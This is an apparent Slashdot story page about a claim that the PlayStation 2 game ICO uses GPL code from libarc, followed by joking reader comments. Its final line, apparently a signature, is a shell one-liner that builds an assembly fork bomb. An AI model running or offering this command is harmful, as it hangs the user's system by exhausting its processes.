PlayStation 2 Game ICO Violates the GPL
An anonymous reader writes "Apparently the video game ICO for the Playstation 2 is using GPL-licensed code from libarc. Sony could end up having to release the source code for the entire game!"
← Back to Stories (view on slashdot.org)
Take the cheese to sickbay, the doctor should see it as soon as possible - B'Elanna Torres, "Learning Curve"
Arm chair lawyer alert! Slashdot, where programmers become legal vigilantes.
why do I want the source code for a game I have never heard of?
:p
Because you're tired of playing Tux Racer and the other two GPLed games?
The World's Worst Webcomic!
I hope not, I was looking forward to a good witchburning.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;